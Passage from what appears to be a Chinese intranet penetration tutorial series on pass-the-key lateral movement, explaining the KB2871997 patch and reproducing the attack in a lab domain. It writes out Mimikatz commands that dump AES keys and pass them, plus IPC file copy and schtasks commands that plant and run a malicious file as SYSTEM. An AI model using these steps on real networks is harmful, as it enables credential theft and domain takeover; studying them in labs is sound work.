网站建设工资多少,医院网站建设利法拉网络,天津网站公司,公司软件网站建设系列文章第一章节之基础知识篇
内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基…系列文章第一章节之基础知识篇
内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基础知识-域中的权限划分和基本思想 内网渗透(七)之基础知识-企业常见安全域划分和结构 内网渗透(八)之基础知识-企业域中计算机分类和专业名
系列文章第二章节之内网信息收集篇
内网渗透(九)之内网信息收集-手动本地信息收集 内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息 内网渗透(十一)之内网信息收集-内网IP扫描和发现 内网渗透(十二)之内网信息收集-内网端口扫描和发现 内网渗透(十三)之内网信息收集-收集域环境中的基本信息 内网渗透(十四)之内网信息收集-域环境中查找域内用户基本信息 内网渗透(十五)之内网信息收集-域环境中定位域管理员 内网渗透(十六)之内网信息收集-powershell基础知识 内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位
系列文章第三章节之Windows协议认证和密码抓取篇
内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希 内网渗透(十九)之Windows协议认证和密码抓取-网络认证(基于挑战响应认证的NTLM协议) 内网渗透(二十)之Windows协议认证和密码抓取-域认证(Kerberos协议) 内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式 内网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式 内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码 内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash 内网渗透(二十六)之Windows协议认证和密码抓取-浏览器、数据库等其他密码的抓取 内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具 内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解 内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施
系列文章第四章节之横向移动篇
内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动 内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动 内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动 内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动 内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动 内网渗透(三十五)之横向移动篇-IPC配合系统服务横向移动 内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和域内用户枚举横向移动 内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动
注阅读本编文章前请先阅读系列文章以免造成看不懂的情况
pass the key 密钥传递攻击(PTK)横向攻击
PTK介绍
WinXP/2003/Vista/2008 以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012这些环境我们都可以使用NTLM哈希传递
对于8.1/2012r2安装补丁kb2871997的Win 7/2008r2/8/2012可以使用AES keys代替NTLM来进行验证
什么是KB2871997
KB2871997禁止本地管理员账户用于远程连接这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。
这个补丁发布后常规的Pass The Hash已经无法成功唯独默认的 Administrator (SID 500)账号例外利用这个账号仍可以进行Pass The Hash远程连接即使administrator修改了名字
但是还可以通过AES密钥来替代NTLM验证进行横向的操作其实这个补丁挺鸡肋的不用AES密钥照样也可以用NTLM只是需要AdministratorSID 500都拿到机器了Administrator还不容易吗这个补丁唯一的好处就是减少存储在内存中的凭据数据也就是让wdigest协议认证的凭据不会存储在lsass.exe这样子当你dump lsass.exe的时候你就会发现wdigest协议中的凭据你就看不到了
实验复现
实验环境
机器名登录用户IPWindows 2012域控administrator域管理员192.168.41.10windows 2012-2(域内主机)administrator本地管理员192.168.41.15Windows 10域内主机administrator本地管理员192.168.41.14
实验前提
我们已经控制了2012-2主机发现他是administrator本地用户登录系统通过抓取密码发现域管账号存在内存中但是没有明文PTH攻击也失效这个时候采用PTK攻击
实验步骤
通过各种方式先拿到2012-2主机的权限 然后我们通过Mimikatz去抓取密码
sekurlsa::ekeys成功抓取到域管理员用户的aes265_hmac密码 利用pass the key 密钥传递攻击(PTK)进行横向攻击
mimikatz sekurlsa::pth /user:administrator /domain:hack.com /aes256:618c111cdcfd83adec90ea4866dba426f6b2362484ea4626fb1ee9b43bd2f85b命令执行完成后会在我们控制的机器上弹出一个cmd的窗口 这个弹窗由于有了域管理员用户的票据所以我们可以访问win10电脑了 接下来我们去建立IPC链接建立计划任务上线win10 这个程序是我们放置在2012-2机器上的恶意程序接下来我们把它拷贝到win10机器上
copy 恶意文件 \\机器名\C$
#注意这里不能写IP地址一定要写机器名schtasks命令创建计划任务
schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /fschtasks命令执行计划任务
schtasks /run /s IP地址 /i /tn 计划任务名目标机器win10成功上线
